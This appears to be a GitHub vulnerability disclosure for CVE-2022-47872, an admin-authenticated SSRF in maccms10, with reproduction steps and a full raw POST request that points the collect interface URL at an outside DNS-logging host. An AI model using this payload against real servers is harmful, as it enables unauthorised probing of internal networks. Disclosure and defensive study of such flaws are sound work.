Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

#CVE-2022-47872

maccms10 admin+ ssrf attacks

Overview

Manufacturer's website information:https://maccms.pro

Source code download address : https://github.com/maccmspro/maccms10.git

Affected version: V2021.1000.2000

图片

2.Vulnerability details

maccmspro/maccms10#22

Enter the background, click Collect --> Custom interface --> Interface address,

In the name box into payload1:http://7ca8e96e.dns.1433.eu.org.

It can cause ssrf attacks.

Vulnerability name:ssrf attacks

Vulnerability level:Medium risk

Vulnerability location: click Collect --> Custom interface --> Interface address

3.Recurring vulnerabilities and

POST http://192.168.52.163/admin.php/admin/collect/info.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: /

AcceptLanguage: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate

Content-Type: applicat ion/ x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 226

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/collect/info.html

Cookie: PHPSESSID=gn328q2i2ruajsh96qoll65ia7

collect_id=&token=8d639020c85bde89f9276381d2460046&collect_name=1111&collect_url=http%3A%2F%2F7ca8e96e.dns.1433.eu.org.&collect_param=%26q%3D1&collect_type=1&collect_mid=1&collect_opt=Ø&collect_filter=0&collect_filter_from=

图片

图片

图片

图片

图片